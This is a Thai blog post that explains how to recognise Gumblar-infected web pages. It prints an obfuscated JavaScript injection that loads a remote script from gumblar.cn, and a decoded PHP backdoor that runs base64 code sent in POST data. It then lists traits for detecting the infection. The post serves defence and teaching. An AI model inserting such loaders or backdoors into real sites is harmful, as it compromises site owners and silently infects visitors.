..... ทุกๆ คนย่อมมีความลับ และความลับไม่มีในโลก เช่นเดียวกันกับ Gumblar อย่างน้อยก็ให้ได้รู้จักว่ารูปร่างหน้าตาเป็นอย่างไร จะได้รู้ทางหนีทีไล่และวิธีป้องกันที่ถูกต้องกับ Trojan ตัวนี้ และตัวอื่นๆ ที่อยากใช้แนวทางคล้ายๆ กัน
- เว็บเพจที่ติด Gumblar จะมี Script หน้าตาแปลกๆ แบบนี้ (จากตอนที่ 1)
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);
- แต่ละเว็บไซต์ที่ติด Gumblar จะมี Script หน้าตาต่างๆ กันไปแต่ก็เรียกเหมือนกันว่า gumblar.cn และสามารถสังเกตได้จากลักษณะคล้ายๆ กันดังนี้
- script ขึ้นต้นด้วย “(function(“
- function จะไม่มีชื่อ (เป็น function ที่เรียกตัวเองทำงาน)
- script มีการเข้ารหัสดูซับซ้อน และเครื่องหมาย % จะถูกเปลี่ยนไปเป็นตัวอื่นเพื่อให้ตรวจพบและเข้าใจยาก ตัวอย่างเช่น
"…20a.3d.22Sc.72iptEngin.65…",
"…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…",
"…v_61_72_20_61_3d_22_53_63rip_74E_6e…"
(ในตัวอย่างเครื่องหมาย % ถูกเปลี่ยนเป็น ~)
- ใกล้ๆ ตอนท้ายของ funtion มี ".replace(" function
- ถ้า function มีการรับค่าต่างๆ ใกล้ส่วนท้ายสุดจะเห็นคำสั่ง regular expression เช่น /"/g or /~/g ฯลฯ ที่ใช้ถอดรหัสจากการเข้ารหัสเครื่องหมาย % ในข้อ 3
เมื่อ decode ถอดรหัสกลับมาเป็น php แล้ว จะมีหน้าตาแบบนี้ ...
if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61′Gumblar สามารถเรียกใช้คำสั่ง php ได้หมดผ่านคำสั่งนี้
- เมื่อ script ถูกเรียกใช้งาน (เมื่อมีการเรียกดูเว็บเพจที่มี script gumblar อยู่) อีก script หนึ่ง จาก gumblar.cn/rss จะถูกแอบดาวน์โหลดมาและเรียกให้ทำงานแบบเงียบๆ
- โดยปกติแล้ว Gumblar script จะถูกแทรกไว้ก่อน (ในไฟล์ .html)
- บางทีก็พบ Gumblar ในรูปแบบ โทรจัน iframe ซึ่งชี้ไปยังหน้าที่ติด gumblar อีกทีั
- GumBlar ต่างจาก โทรจัีน iframe อื่นๆ ที่มักจะัติดแค่ไฟล์ที่มักใช้กันบ่อยๆ เช่น index.html, index.php แต่ Gumblar ติดได้ทุกๆ ไฟล์ เนื่องจาก Gumblar เข้าใช้งานผ่านโปรแกรม ftp ทำให้เ้ห็นไฟล์ทั้งหมดที่มีอยู่
- ในไฟล์จาวาสคริปต์ .js โค๊ดของ Gumblar จะอยู่บรรทัดสุดท้าย
- เท่าที่พบ Gumblar จะติดเว็บไซต์ที่ใช้ PHP ถึง 95% แต่ส่วนที่เหลือก็อาจติดก็เป็นไปได้
- Gumblar ไม่ได้ใช้ช่องโหว่หรือจุดอ่อนของ PHP เพราะโปรแกรมที่น่าเชื่อถือต่างๆ เช่น Wordpress, Joomla, phpBB, SMF ฯลฯ ก็ยังติด Gumblar ได้เนื่องจาก Gumblar ใช้วิธีฝังตัวเองผ่านโปรแกรม FTP ดังข้อ 6
- สำหรับไฟล์ .php แล้ว Gumblar จะอยู่บรรทัดบนสุด และมีหน้าตาดังนี้
- Gumblar ไม่ได้เป็น Server-Wide Exploit คือจะไม่ติดไปยังเว็บอื่นใน server เดียวกัน เพราะ Gumblar จะเข้าไปฝังตัวเองจากโปรแกรม ftp จากเครื่องที่ติดเท่านั้น ไม่สามารถเข้าไปยัง account อื่นได้เนื่องจากอยู่คนละ account
- Gumblar.cn เป็นเว็บไซต์ที่ Google จัดว่าเป็น Blacklist
0 comments:
Post a Comment